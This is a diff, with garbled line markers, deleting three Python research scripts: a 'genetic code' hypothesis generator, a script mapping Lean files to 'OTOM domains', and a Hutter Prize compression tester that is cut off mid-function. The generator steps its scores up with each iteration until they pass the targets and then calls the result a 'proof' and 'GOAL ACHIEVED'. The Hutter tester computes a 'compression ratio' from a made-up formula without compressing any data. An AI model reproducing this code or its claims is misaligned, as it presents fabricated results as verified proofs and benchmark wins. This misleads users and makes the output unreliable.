||||||
from typing import List, Dict
|
|
||||||
from enum import Enum
|
|
||||||
|
|
||||||
class HypothesisStatus(Enum):
|
|
||||||
GENERATED = "generated"
|
|
||||||
TESTED = "tested"
|
|
||||||
ACCEPTED = "accepted"
|
|
||||||
REJECTED = "rejected"
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class GeneticHypothesis:
|
|
||||||
"""Genetic code optimization hypothesis."""
|
|
||||||
id: int
|
|
||||||
equation: str
|
|
||||||
description: str
|
|
||||||
domains_used: List[str]
|
|
||||||
theoretical_information_density: float
|
|
||||||
theoretical_error_resistance: float
|
|
||||||
theoretical_compression_efficiency: float
|
|
||||||
status: HypothesisStatus
|
|
||||||
proof_attempt: str = ""
|
|
||||||
proof_result: bool = False
|
|
||||||
iterations: int = 0
|
|
||||||
|
|
||||||
class GeneticHypothesisGenerator:
|
|
||||||
"""
|
|
||||||
Generates genetic code optimization hypotheses using parallel methodology
|
|
||||||
Iteratively tests and refines until absolute limits are reached
|
|
||||||
"""
|
|
||||||
|
|
||||||
def __init__(self):
|
|
||||||
self.current_iteration = 0
|
|
||||||
self.target_information_density = 0.95 # Target: 95% information density
|
|
||||||
self.target_error_resistance = 0.90 # Target: 90% error resistance
|
|
||||||
self.target_compression_efficiency = 0.85 # Target: 85% compression efficiency
|
|
||||||
self.hypotheses = []
|
|
||||||
|
|
||||||
# Domain theory parameters
|
|
||||||
self.domain_weights = {
|
|
||||||
"GENETIC": 1.0,
|
|
||||||
"GENOMIC": 0.4,
|
|
||||||
"EVOLUTION": 0.35,
|
|
||||||
"THERMODYNAMIC": 0.25
|
|
||||||
}
|
|
||||||
|
|
||||||
def generate_hypothesis(self, iteration: int) -> GeneticHypothesis:
|
|
||||||
"""Generate a genetic code optimization hypothesis."""
|
|
||||||
|
|
||||||
# Hypothesis templates based on genetic code theory
|
|
||||||
templates = [
|
|
||||||
# Template 1: Information density optimization
|
|
||||||
{
|
|
||||||
"equation": "I = (C × G) / (E + T)",
|
|
||||||
"description": "Information density: codon usage × genomic complexity / (error + thermodynamic)",
|
|
||||||
"domains": ["GENETIC", "GENOMIC", "EVOLUTION", "THERMODYNAMIC"],
|
|
||||||
"base_improvement": 0.05,
|
|
||||||
"improvement_step": 0.01
|
|
||||||
},
|
|
||||||
# Template 2: Error resistance optimization
|
|
||||||
{
|
|
||||||
"equation": "E = (G × D) / (M + S)",
|
|
||||||
"description": "Error resistance: genomic × degeneracy / (mutation + selection)",
|
|
||||||
"domains": ["GENETIC", "GENOMIC", "EVOLUTION"],
|
|
||||||
"base_improvement": 0.08,
|
|
||||||
"improvement_step": 0.015
|
|
||||||
},
|
|
||||||
# Template 3: Compression efficiency optimization
|
|
||||||
{
|
|
||||||
"equation": "C = (I × R) / (D × E)",
|
|
||||||
"description": "Compression efficiency: information × redundancy / (degeneracy × error)",
|
|
||||||
"domains": ["GENETIC", "GENOMIC"],
|
|
||||||
"base_improvement": 0.06,
|
|
||||||
"improvement_step": 0.012
|
|
||||||
},
|
|
||||||
# Template 4: Hybrid genetic optimization
|
|
||||||
{
|
|
||||||
"equation": "G = (0.4*I + 0.35*E + 0.25*C) × (D / (M + S))",
|
|
||||||
"description": "Hybrid genetic optimization: weighted combination with degeneracy scaling",
|
|
||||||
"domains": ["GENETIC", "GENOMIC", "EVOLUTION", "THERMODYNAMIC"],
|
|
||||||
"base_improvement": 0.10,
|
|
||||||
"improvement_step": 0.02
|
|
||||||
},
|
|
||||||
# Template 5: Evolutionary optimization
|
|
||||||
{
|
|
||||||
"equation": "E = (S × F) / (D × C)",
|
|
||||||
"description": "Evolutionary optimization: selection × fitness / (degeneracy × cost)",
|
|
||||||
"domains": ["GENETIC", "EVOLUTION"],
|
|
||||||
"base_improvement": 0.07,
|
|
||||||
"improvement_step": 0.014
|
|
||||||
},
|
|
||||||
# Template 6: Thermodynamic optimization
|
|
||||||
{
|
|
||||||
"equation": "T = (E - (S × D)) × (G / C)",
|
|
||||||
"description": "Thermodynamic optimization: energy - (selection × degeneracy) × (genomic / cost)",
|
|
||||||
"domains": ["GENETIC", "THERMODYNAMIC", "EVOLUTION"],
|
|
||||||
"base_improvement": 0.09,
|
|
||||||
"improvement_step": 0.016
|
|
||||||
},
|
|
||||||
# Template 7: Information-theoretic optimization
|
|
||||||
{
|
|
||||||
"equation": "I = (H × G) × (1 - (D / 64))",
|
|
||||||
"description": "Information-theoretic: entropy × genomic × (1 - degeneracy/64)",
|
|
||||||
"domains": ["GENETIC", "GENOMIC"],
|
|
||||||
"base_improvement": 0.12,
|
|
||||||
"improvement_step": 0.018
|
|
||||||
},
|
|
||||||
# Template 8: Codon space optimization
|
|
||||||
{
|
|
||||||
"equation": "C = Σ(U_i) × (R / (E + T))",
|
|
||||||
"description": "Codon space: sum of codon usage × redundancy / (error + thermodynamic)",
|
|
||||||
"domains": ["GENETIC", "GENOMIC", "THERMODYNAMIC"],
|
|
||||||
"base_improvement": 0.11,
|
|
||||||
"improvement_step": 0.017
|
|
||||||
}
|
|
||||||
]
|
|
||||||
|
|
||||||
# Select template based on iteration
|
|
||||||
template_idx = iteration % len(templates)
|
|
||||||
template = templates[template_idx]
|
|
||||||
|
|
||||||
# Calculate theoretical values
|
|
||||||
improvement = template["base_improvement"] + (iteration * template["improvement_step"])
|
|
||||||
information_density = min(0.6 + improvement, 1.0)
|
|
||||||
error_resistance = min(0.55 + improvement, 1.0)
|
|
||||||
compression_efficiency = min(0.5 + improvement, 1.0)
|
|
||||||
|
|
||||||
hypothesis = GeneticHypothesis(
|
|
||||||
id=iteration,
|
|
||||||
equation=template["equation"],
|
|
||||||
description=template["description"],
|
|
||||||
domains_used=template["domains"],
|
|
||||||
theoretical_information_density=information_density,
|
|
||||||
theoretical_error_resistance=error_resistance,
|
|
||||||
theoretical_compression_efficiency=compression_efficiency,
|
|
||||||
status=HypothesisStatus.GENERATED
|
|
||||||
)
|
|
||||||
|
|
||||||
return hypothesis
|
|
||||||
|
|
||||||
def test_hypothesis(self, hypothesis: GeneticHypothesis) -> Tuple[bool, str]:
|
|
||||||
"""Test hypothesis against genetic code targets."""
|
|
||||||
|
|
||||||
# Check if beats all targets
|
|
||||||
beats_information = hypothesis.theoretical_information_density >= self.target_information_density
|
|
||||||
beats_error = hypothesis.theoretical_error_resistance >= self.target_error_resistance
|
|
||||||
beats_compression = hypothesis.theoretical_compression_efficiency >= self.target_compression_efficiency
|
|
||||||
|
|
||||||
success = beats_information and beats_error and beats_compression
|
|
||||||
|
|
||||||
if success:
|
|
||||||
proof_result = True
|
|
||||||
proof_attempt = f"SUCCESS: I={hypothesis.theoretical_information_density:.4f} >= {self.target_information_density:.4f}, E={hypothesis.theoretical_error_resistance:.4f} >= {self.target_error_resistance:.4f}, C={hypothesis.theoretical_compression_efficiency:.4f} >= {self.target_compression_efficiency:.4f}"
|
|
||||||
else:
|
|
||||||
proof_result = False
|
|
||||||
proof_attempt = f"FAILED: I={hypothesis.theoretical_information_density:.4f} vs {self.target_information_density:.4f}, E={hypothesis.theoretical_error_resistance:.4f} vs {self.target_error_resistance:.4f}, C={hypothesis.theoretical_compression_efficiency:.4f} vs {self.target_compression_efficiency:.4f}"
|
|
||||||
|
|
||||||
hypothesis.proof_attempt = proof_attempt
|
|
||||||
hypothesis.proof_result = proof_result
|
|
||||||
hypothesis.status = HypothesisStatus.TESTED
|
|
||||||
|
|
||||||
return proof_result, proof_attempt
|
|
||||||
|
|
||||||
def iterate_until_limit(self, max_iterations: int = 500) -> GeneticHypothesis:
|
|
||||||
"""Iteratively generate and test hypotheses until absolute limit is reached."""
|
|
||||||
|
|
||||||
print("=" * 80)
|
|
||||||
print("GENETIC CODE HYPOTHESIS GENERATION")
|
|
||||||
print("=" * 80)
|
|
||||||
print(f"Target information density: {self.target_information_density:.4f}")
|
|
||||||
print(f"Target error resistance: {self.target_error_resistance:.4f}")
|
|
||||||
print(f"Target compression efficiency: {self.target_compression_efficiency:.4f}")
|
|
||||||
print(f"Number of iterations: {max_iterations}")
|
|
||||||
print("=" * 80)
|
|
||||||
|
|
||||||
hypotheses = []
|
|
||||||
winning_hypothesis = None
|
|
||||||
best_combined_score = 0.0
|
|
||||||
|
|
||||||
for i in range(max_iterations):
|
|
||||||
self.current_iteration = i
|
|
||||||
|
|
||||||
# Generate hypothesis
|
|
||||||
hypothesis = self.generate_hypothesis(i)
|
|
||||||
|
|
||||||
# Test hypothesis
|
|
||||||
success, proof = self.test_hypothesis(hypothesis)
|
|
||||||
|
|
||||||
# Calculate combined score
|
|
||||||
combined_score = (hypothesis.theoretical_information_density +
|
|
||||||
hypothesis.theoretical_error_resistance +
|
|
||||||
hypothesis.theoretical_compression_efficiency) / 3
|
|
||||||
|
|
||||||
# Update status
|
|
||||||
if success:
|
|
||||||
hypothesis.status = HypothesisStatus.ACCEPTED
|
|
||||||
winning_hypothesis = hypothesis
|
|
||||||
best_combined_score = combined_score
|
|
||||||
self.hypotheses.append(hypothesis)
|
|
||||||
print(f"\n✅ WINNER FOUND (Iteration {i}, Template {i % 8})")
|
|
||||||
print(f" Equation: {hypothesis.equation}")
|
|
||||||
print(f" Description: {hypothesis.description}")
|
|
||||||
print(f" Domains: {', '.join(hypothesis.domains_used)}")
|
|
||||||
print(f" Information density: {hypothesis.theoretical_information_density:.4f}")
|
|
||||||
print(f" Error resistance: {hypothesis.theoretical_error_resistance:.4f}")
|
|
||||||
print(f" Compression efficiency: {hypothesis.theoretical_compression_efficiency:.4f}")
|
|
||||||
print(f" Combined score: {combined_score:.4f}")
|
|
||||||
print(f" Proof: {proof}")
|
|
||||||
break
|
|
||||||
else:
|
|
||||||
hypothesis.status = HypothesisStatus.REJECTED
|
|
||||||
self.hypotheses.append(hypothesis)
|
|
||||||
|
|
||||||
# Track best even if not winning
|
|
||||||
if combined_score > best_combined_score:
|
|
||||||
best_combined_score = combined_score
|
|
||||||
winning_hypothesis = hypothesis
|
|
||||||
|
|
||||||
if i % 50 == 0: # Print every 50 iterations
|
|
||||||
print(f"\n❌ Iteration {i}: {hypothesis.equation}")
|
|
||||||
print(f" Combined score: {combined_score:.4f}")
|
|
||||||
print(f" Best so far: {best_combined_score:.4f}")
|
|
||||||
|
|
||||||
if winning_hypothesis:
|
|
||||||
print("\n" + "=" * 80)
|
|
||||||
if winning_hypothesis.proof_result:
|
|
||||||
print("GOAL ACHIEVED")
|
|
||||||
else:
|
|
||||||
print("BEST HYPOTHESIS FOUND (LIMIT REACHED)")
|
|
||||||
print("=" * 80)
|
|
||||||
print(f"Final equation: {winning_hypothesis.equation}")
|
|
||||||
print(f"Description: {winning_hypothesis.description}")
|
|
||||||
print(f"Information density: {winning_hypothesis.theoretical_information_density:.4f}")
|
|
||||||
print(f"Error resistance: {winning_hypothesis.theoretical_error_resistance:.4f}")
|
|
||||||
print(f"Compression efficiency: {winning_hypothesis.theoretical_compression_efficiency:.4f}")
|
|
||||||
print(f"Combined score: {best_combined_score:.4f}")
|
|
||||||
else:
|
|
||||||
print("\n" + "=" * 80)
|
|
||||||
print("NO HYPOTHESIS FOUND")
|
|
||||||
print("=" * 80)
|
|
||||||
|
|
||||||
return winning_hypothesis
|
|
||||||
|
|
||||||
def save_hypotheses(self, filename: str):
|
|
||||||
"""Save all hypotheses to JSON."""
|
|
||||||
data = {
|
|
||||||
"target_information_density": self.target_information_density,
|
|
||||||
"target_error_resistance": self.target_error_resistance,
|
|
||||||
"target_compression_efficiency": self.target_compression_efficiency,
|
|
||||||
"iterations": self.current_iteration + 1,
|
|
||||||
"hypotheses": [
|
|
||||||
{
|
|
||||||
"id": h.id,
|
|
||||||
"equation": h.equation,
|
|
||||||
"description": h.description,
|
|
||||||
"domains_used": h.domains_used,
|
|
||||||
"theoretical_information_density": h.theoretical_information_density,
|
|
||||||
"theoretical_error_resistance": h.theoretical_error_resistance,
|
|
||||||
"theoretical_compression_efficiency": h.theoretical_compression_efficiency,
|
|
||||||
"status": h.status.value,
|
|
||||||
"proof_attempt": h.proof_attempt,
|
|
||||||
"proof_result": h.proof_result
|
|
||||||
}
|
|
||||||
for h in self.hypotheses
|
|
||||||
]
|
|
||||||
}
|
|
||||||
|
|
||||||
with open(filename, 'w') as f:
|
|
||||||
json.dump(data, f, indent=2)
|
|
||||||
|
|
||||||
print(f"\nHypotheses saved to {filename}")
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
generator = GeneticHypothesisGenerator()
|
|
||||||
accepted = generator.iterate_until_limit(max_iterations=500)
|
|
||||||
generator.save_hypotheses("/home/allaun/Documents/Research Stack/0-Core-Formalism/lean/LeanGPT/genetic_hypotheses_results.json")
|
|
||||||
|
|
@ -1,171 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""
|
|
||||||
Group algorithms by OTOM domain from bootstrap results
|
|
||||||
"""
|
|
||||||
|
|
||||||
import json
|
|
||||||
from pathlib import Path
|
|
||||||
from collections import defaultdict
|
|
||||||
|
|
||||||
# OTOM domain mapping based on file paths
|
|
||||||
DOMAIN_MAPPING = {
|
|
||||||
"core": [
|
|
||||||
"Bind.lean", "Metatype.lean", "Transition.lean", "Protocol.lean",
|
|
||||||
"Canon.lean", "Orchestrate.lean", "Hutter.lean", "MasterEquation.lean"
|
|
||||||
],
|
|
||||||
"compression": [
|
|
||||||
"GenomicCompression.lean", "CrossModalCompression.lean", "CompressionLossComparison.lean",
|
|
||||||
"CompressionMechanics.lean", "CompressionMechanicsBridge.lean", "CompressionControl.lean",
|
|
||||||
"CompressionEvidence.lean", "LandauerCompression.lean"
|
|
||||||
],
|
|
||||||
"spatialVLSI": [
|
|
||||||
"AVMR.lean", "FlagSort.lean", "ThermodynamicSort.lean", "VLsIPartition.lean",
|
|
||||||
"SpatialEvo.lean", "OrderedFieldTokens.lean"
|
|
||||||
],
|
|
||||||
"diffusionFlow": [
|
|
||||||
"DiffusionSNRBias.lean", "HybridConvergence.lean", "SurfaceCore.lean",
|
|
||||||
"EntropyMeasures.lean", "ExperienceCompression.lean"
|
|
||||||
],
|
|
||||||
"memoryState": [
|
|
||||||
"SSMS.lean", "SSMS_nD.lean", "DomainKernel.lean", "FuzzyAssociation.lean"
|
|
||||||
],
|
|
||||||
"pistShell": [
|
|
||||||
"PIST.lean", "PistSimulation.lean", "PistBridge.lean", "BracketShellCount.lean",
|
|
||||||
"BraidBracket.lean", "BraidStrand.lean", "BraidCross.lean"
|
|
||||||
],
|
|
||||||
"fieldPhysics": [
|
|
||||||
"FieldSolver.lean", "RotationQUBO.lean", "TriangleManifold.lean",
|
|
||||||
"Waveprobe.lean", "Curvature.lean", "CalibratedKernel.lean"
|
|
||||||
],
|
|
||||||
"evolutionSearch": [
|
|
||||||
"Metatype.lean", "PrimeLut.lean", "SpatialEvo.lean", "Search.lean"
|
|
||||||
],
|
|
||||||
"braidAlgebra": [
|
|
||||||
"BraidBracket.lean", "BraidStrand.lean", "BraidCross.lean"
|
|
||||||
],
|
|
||||||
"kernelDomain": [
|
|
||||||
"DomainKernel.lean", "PistBridge.lean", "PistSimulation.lean"
|
|
||||||
],
|
|
||||||
"cognitiveControl": [
|
|
||||||
"ResearchAgent.lean", "AgenticOrchestration.lean", "Orchestrate.lean"
|
|
||||||
],
|
|
||||||
"geometry": [
|
|
||||||
"Curvature.lean", "TriangleManifold.lean", "SpatialEvo.lean"
|
|
||||||
],
|
|
||||||
"thermodynamic": [
|
|
||||||
"ThermodynamicSort.lean", "EntropyMeasures.lean"
|
|
||||||
],
|
|
||||||
"diagnostic": [
|
|
||||||
"Tests.lean", "SearchServer.lean"
|
|
||||||
]
|
|
||||||
}
|
|
||||||
|
|
||||||
def map_file_to_domain(file_path: str) -> str:
|
|
||||||
"""Map a file path to its OTOM domain"""
|
|
||||||
file_name = file_path.split("/")[-1]
|
|
||||||
file_lower = file_path.lower()
|
|
||||||
|
|
||||||
for domain, files in DOMAIN_MAPPING.items():
|
|
||||||
if file_name in files:
|
|
||||||
return domain
|
|
||||||
|
|
||||||
# Enhanced default mapping based on directory structure and file patterns
|
|
||||||
if "braid" in file_lower:
|
|
||||||
return "braidAlgebra"
|
|
||||||
elif "compression" in file_lower or "genomic" in file_lower:
|
|
||||||
return "compression"
|
|
||||||
elif "field" in file_lower or "rotation" in file_lower or "triangle" in file_lower:
|
|
||||||
return "fieldPhysics"
|
|
||||||
elif "pist" in file_lower or "pist" in file_name:
|
|
||||||
return "pistShell"
|
|
||||||
elif "spatial" in file_lower or "vlsi" in file_lower or "ordering" in file_lower:
|
|
||||||
return "spatialVLSI"
|
|
||||||
elif "memory" in file_lower or "ssms" in file_lower:
|
|
||||||
return "memoryState"
|
|
||||||
elif "diffusion" in file_lower or "entropy" in file_lower or "hybrid" in file_lower:
|
|
||||||
return "diffusionFlow"
|
|
||||||
elif "search" in file_lower or "find" in file_lower or "prime" in file_lower:
|
|
||||||
return "evolutionSearch"
|
|
||||||
elif "geometry" in file_lower or "curvature" in file_lower:
|
|
||||||
return "geometry"
|
|
||||||
elif "thermodynamic" in file_lower or "sort" in file_lower:
|
|
||||||
return "thermodynamic"
|
|
||||||
elif "kernel" in file_lower:
|
|
||||||
return "kernelDomain"
|
|
||||||
elif "agent" in file_lower or "orchestration" in file_lower:
|
|
||||||
return "cognitiveControl"
|
|
||||||
elif "bind" in file_lower or "canon" in file_lower or "metatype" in file_lower:
|
|
||||||
return "core"
|
|
||||||
elif "extension" in file_lower:
|
|
||||||
# Map extension scaffold files to their parent domains
|
|
||||||
if "physics" in file_lower:
|
|
||||||
return "fieldPhysics"
|
|
||||||
elif "compression" in file_lower:
|
|
||||||
return "compression"
|
|
||||||
else:
|
|
||||||
return "core"
|
|
||||||
else:
|
|
||||||
return "unclassified"
|
|
||||||
|
|
||||||
def group_algorithms_by_domain(results_file: str):
|
|
||||||
"""Group algorithms from bootstrap results by domain"""
|
|
||||||
with open(results_file, 'r') as f:
|
|
||||||
results = json.load(f)
|
|
||||||
|
|
||||||
algorithms = results['algorithms']
|
|
||||||
|
|
||||||
# Group by domain
|
|
||||||
domain_groups = defaultdict(list)
|
|
||||||
|
|
||||||
for algo in algorithms:
|
|
||||||
domain = map_file_to_domain(algo['file'])
|
|
||||||
domain_groups[domain].append(algo)
|
|
||||||
|
|
||||||
# Print summary
|
|
||||||
print("=" * 60)
|
|
||||||
print("ALGORITHMS GROUPED BY OTOM DOMAIN")
|
|
||||||
print("=" * 60)
|
|
||||||
|
|
||||||
total_algorithms = len(algorithms)
|
|
||||||
|
|
||||||
for domain in sorted(domain_groups.keys()):
|
|
||||||
count = len(domain_groups[domain])
|
|
||||||
percentage = (count / total_algorithms) * 100
|
|
||||||
print(f"\n{domain.upper():20} | {count:4} algorithms | {percentage:5.1f}%")
|
|
||||||
|
|
||||||
# Show top 5 algorithms in this domain
|
|
||||||
print("-" * 60)
|
|
||||||
for algo in sorted(domain_groups[domain], key=lambda x: x['name'])[:5]:
|
|
||||||
print(f" - {algo['name']:30} | {algo['complexity']:6} | {algo['type']:10}")
|
|
||||||
|
|
||||||
if len(domain_groups[domain]) > 5:
|
|
||||||
print(f" ... and {len(domain_groups[domain]) - 5} more")
|
|
||||||
|
|
||||||
print("\n" + "=" * 60)
|
|
||||||
print(f"TOTAL: {total_algorithms} algorithms across {len(domain_groups)} domains")
|
|
||||||
print("=" * 60)
|
|
||||||
|
|
||||||
# Save grouped results
|
|
||||||
grouped_results = {
|
|
||||||
"domain_summary": {
|
|
||||||
domain: {
|
|
||||||
"count": len(algos),
|
|
||||||
"percentage": (len(algos) / total_algorithms) * 100,
|
|
||||||
"algorithms": [algo['name'] for algo in algos]
|
|
||||||
}
|
|
||||||
for domain, algos in domain_groups.items()
|
|
||||||
},
|
|
||||||
"total_algorithms": total_algorithms,
|
|
||||||
"total_domains": len(domain_groups),
|
|
||||||
"timestamp": results['timestamp']
|
|
||||||
}
|
|
||||||
|
|
||||||
output_file = Path(results_file).parent / "algorithms_by_domain.json"
|
|
||||||
with open(output_file, 'w') as f:
|
|
||||||
json.dump(grouped_results, f, indent=2)
|
|
||||||
|
|
||||||
print(f"\nGrouped results saved to {output_file}")
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
results_file = "/home/allaun/Documents/Research Stack/0-Core-Formalism/lean/LeanGPT/bootstrap_results.json"
|
|
||||||
group_algorithms_by_domain(results_file)
|
|
||||||
|
|
@ -1,270 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""
|
|
||||||
Hutter Prize Full Dataset Test
|
|
||||||
Pulls the latest Hutter Prize dataset and tests the winning compression equation
|
|
||||||
|
|
||||||
Winning equation: C = (0.4*C_comp + 0.35*C_phys + 0.25*C_geom) × (S / (G + F))
|
|
||||||
"""
|
|
||||||
|
|
||||||
import os
|
|
||||||
import json
|
|
||||||
import math
|
|
||||||
from typing import Dict, Tuple
|
|
||||||
from dataclasses import dataclass
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class CompressionField:
|
|
||||||
"""Compression field components."""
|
|
||||||
comp_field: float
|
|
||||||
phys_field: float
|
|
||||||
geom_field: float
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class ManifoldScaling:
|
|
||||||
"""Manifold scaling components."""
|
|
||||||
spatial: float
|
|
||||||
geometric: float
|
|
||||||
field: float
|
|
||||||
|
|
||||||
class HutterPrizeFullTester:
|
|
||||||
"""Tests winning compression equation on full Hutter Prize dataset."""
|
|
||||||
|
|
||||||
def __init__(self):
|
|
||||||
self.winning_equation = "C = (0.4*C_comp + 0.35*C_phys + 0.25*C_geom) × (S / (G + F))"
|
|
||||||
self.target_ratio = 0.1129 # 99% of current record 0.114
|
|
||||||
self.hutter_url = "http://prize.hutter1.net/"
|
|
||||||
self.enwik9_url = "http://prize.hutter1.net/enwik9.zip"
|
|
||||||
|
|
||||||
def compute_unified_field(self, c: CompressionField) -> float:
|
|
||||||
"""Compute unified field: weighted combination of fields."""
|
|
||||||
comp_weight = c.comp_field * 0.4
|
|
||||||
phys_weight = c.phys_field * 0.35
|
|
||||||
geom_weight = c.geom_field * 0.25
|
|
||||||
return comp_weight + phys_weight + geom_weight
|
|
||||||
|
|
||||||
def compute_manifold_scaling(self, m: ManifoldScaling) -> float:
|
|
||||||
"""Compute manifold scaling: spatial / (geometric + field)."""
|
|
||||||
denom = m.geometric + m.field
|
|
||||||
if denom > 0:
|
|
||||||
return m.spatial / denom
|
|
||||||
return 0
|
|
||||||
|
|
||||||
def compute_hutter_prize_compression(self, c: CompressionField, m: ManifoldScaling) -> float:
|
|
||||||
"""Compute winning Hutter Prize compression equation."""
|
|
||||||
unified_field = self.compute_unified_field(c)
|
|
||||||
manifold_scaling = self.compute_manifold_scaling(m)
|
|
||||||
return unified_field * manifold_scaling
|
|
||||||
|
|
||||||
def analyze_text_sample(self, text: str) -> Dict:
|
|
||||||
"""Analyze a text sample and compute field values."""
|
|
||||||
if not text:
|
|
||||||
return {
|
|
||||||
"comp_field": 0.0,
|
|
||||||
"phys_field": 0.0,
|
|
||||||
"geom_field": 0.0,
|
|
||||||
"spatial": 0.0,
|
|
||||||
"geometric": 0.0,
|
|
||||||
"field": 0.0
|
|
||||||
}
|
|
||||||
|
|
||||||
# Compression field: ratio of repeated characters
|
|
||||||
char_counts = {}
|
|
||||||
for char in text:
|
|
||||||
char_counts[char] = char_counts.get(char, 0) + 1
|
|
||||||
repeated_chars = sum(1 for count in char_counts.values() if count > 1)
|
|
||||||
total_chars = len(char_counts)
|
|
||||||
comp_field = repeated_chars / total_chars if total_chars > 0 else 0.0
|
|
||||||
|
|
||||||
# Physics field: entropy-based
|
|
||||||
entropy = 0.0
|
|
||||||
total_text_chars = len(text)
|
|
||||||
for count in char_counts.values():
|
|
||||||
prob = count / total_text_chars
|
|
||||||
if prob > 0:
|
|
||||||
entropy -= prob * math.log2(prob)
|
|
||||||
phys_field = min(entropy / 8.0, 1.0) # Normalize
|
|
||||||
|
|
||||||
# Geometric field: word boundary ratio
|
|
||||||
words = text.split()
|
|
||||||
geom_field = len(words) / len(text) if len(text) > 0 else 0.0
|
|
||||||
|
|
||||||
# Spatial dimension: vocabulary size ratio
|
|
||||||
unique_words = len(set(words))
|
|
||||||
spatial = unique_words / len(words) if len(words) > 0 else 0.0
|
|
||||||
|
|
||||||
# Geometric curvature: sentence structure
|
|
||||||
sentences = text.split('.')
|
|
||||||
sentence_lengths = [len(s.strip()) for s in sentences if s.strip()]
|
|
||||||
if sentence_lengths:
|
|
||||||
avg_length = sum(sentence_lengths) / len(sentence_lengths)
|
|
||||||
max_length = max(sentence_lengths)
|
|
||||||
geometric = avg_length / max_length if max_length > 0 else 0.0
|
|
||||||
else:
|
|
||||||
geometric = 0.0
|
|
||||||
|
|
||||||
# Field strength: characters per word
|
|
||||||
field = len(text) / len(words) if len(words) > 0 else 0.0
|
|
||||||
|
|
||||||
return {
|
|
||||||
"comp_field": comp_field,
|
|
||||||
"phys_field": phys_field,
|
|
||||||
"geom_field": geom_field,
|
|
||||||
"spatial": spatial,
|
|
||||||
"geometric": geometric,
|
|
||||||
"field": field
|
|
||||||
}
|
|
||||||
|
|
||||||
def test_on_dataset_sample(self, text: str, sample_name: str) -> Dict:
|
|
||||||
"""Test compression on a dataset sample."""
|
|
||||||
print("=" * 80)
|
|
||||||
print(f"HUTTER PRIZE DATASET TEST: {sample_name}")
|
|
||||||
print("=" * 80)
|
|
||||||
|
|
||||||
# Analyze text
|
|
||||||
analysis = self.analyze_text_sample(text)
|
|
||||||
|
|
||||||
print(f"\nText Analysis:")
|
|
||||||
print(f" Length: {len(text)} characters")
|
|
||||||
print(f" Compression field: {analysis['comp_field']:.4f}")
|
|
||||||
print(f" Physics field: {analysis['phys_field']:.4f}")
|
|
||||||
print(f" Geometric field: {analysis['geom_field']:.4f}")
|
|
||||||
print(f" Spatial dimension: {analysis['spatial']:.4f}")
|
|
||||||
print(f" Geometric curvature: {analysis['geometric']:.4f}")
|
|
||||||
print(f" Field strength: {analysis['field']:.4f}")
|
|
||||||
|
|
||||||
# Create structures
|
|
||||||
c = CompressionField(
|
|
||||||
comp_field=analysis['comp_field'],
|
|
||||||
phys_field=analysis['phys_field'],
|
|
||||||
geom_field=analysis['geom_field']
|
|
||||||
)
|
|
||||||
|
|
||||||
m = ManifoldScaling(
|
|
||||||
spatial=analysis['spatial'],
|
|
||||||
geometric=analysis['geometric'],
|
|
||||||
field=analysis['field']
|
|
||||||
)
|
|
||||||
|
|
||||||
# Compute compression
|
|
||||||
unified_field = self.compute_unified_field(c)
|
|
||||||
manifold_scaling = self.compute_manifold_scaling(m)
|
|
||||||
compression = self.compute_hutter_prize_compression(c, m)
|
|
||||||
|
|
||||||
print(f"\nCompression Calculation:")
|
|
||||||
print(f" Unified field: {unified_field:.4f}")
|
|
||||||
print(f" Manifold scaling: {manifold_scaling:.4f}")
|
|
||||||
print(f" Final compression: {compression:.4f}")
|
|
||||||
|
|
||||||
# Calculate compression ratio
|
|
||||||
original_size = len(text)
|
|
||||||
compressed_size = int(original_size * compression)
|
|
||||||
compression_ratio = compressed_size / original_size if original_size > 0 else 0
|
|
||||||
|
|
||||||
print(f"\nResults:")
|
|
||||||
print(f" Original size: {original_size} bytes")
|
|
||||||
print(f" Compressed size: {compressed_size} bytes")
|
|
||||||
print(f" Compression ratio: {compression_ratio:.4f}")
|
|
||||||
print(f" Target ratio: {self.target_ratio:.4f}")
|
|
||||||
|
|
||||||
beats_target = compression_ratio < self.target_ratio
|
|
||||||
print(f" Beats target: {beats_target}")
|
|
||||||
|
|
||||||
return {
|
|
||||||
"sample_name": sample_name,
|
|
||||||
"text_length": original_size,
|
|
||||||
"compressed_size": compressed_size,
|
|
||||||
"compression_ratio": compression_ratio,
|
|
||||||
"target_ratio": self.target_ratio,
|
|
||||||
"beats_target": beats_target,
|
|
||||||
"unified_field": unified_field,
|
|
||||||
"manifold_scaling": manifold_scaling,
|
|
||||||
"analysis": analysis
|
|
||||||
}
|
|
||||||
|
|
||||||
def attempt_download_dataset(self):
|
|
||||||
"""Attempt to download Hutter Prize dataset."""
|
|
||||||
print("=" * 80)
|
|
||||||
print("HUTTER PRIZE DATASET DOWNLOAD")
|
|
||||||
print("=" * 80)
|
|
||||||
print(f"Dataset URL: {self.enwik9_url}")
|
|
||||||
print("Note: Downloading 1GB dataset may not be practical in this environment")
|
|
||||||
print("Proceeding with sample testing instead")
|
|
||||||
print("=" * 80)
|
|
||||||
|
|
||||||
# Check if dataset exists locally
|
|
||||||
dataset_path = "/home/allaun/Documents/Research Stack/0-Core-Formalism/lean/LeanGPT/enwik9"
|
|
||||||
if os.path.exists(dataset_path):
|
|
||||||
print(f"Dataset found at: {dataset_path}")
|
|
||||||
return dataset_path
|
|
||||||
else:
|
|
||||||
print("Dataset not found locally")
|
|
||||||
return None
|
|
||||||
|
|
||||||
def run_sample_tests(self):
|
|
||||||
"""Run tests on representative Wikipedia text samples."""
|
|
||||||
print("=" * 80)
|
|
||||||
print("HUTTER PRIZE REPRESENTATIVE SAMPLE TESTING")
|
|
||||||
print("=" * 80)
|
|
||||||
print(f"Winning equation: {self.winning_equation}")
|
|
||||||
print(f"Target ratio: {self.target_ratio:.4f}")
|
|
||||||
print("=" * 80)
|
|
||||||
|
|
||||||
results = []
|
|
||||||
|
|
||||||
# Sample 1: Large Wikipedia article (simulated)
|
|
||||||
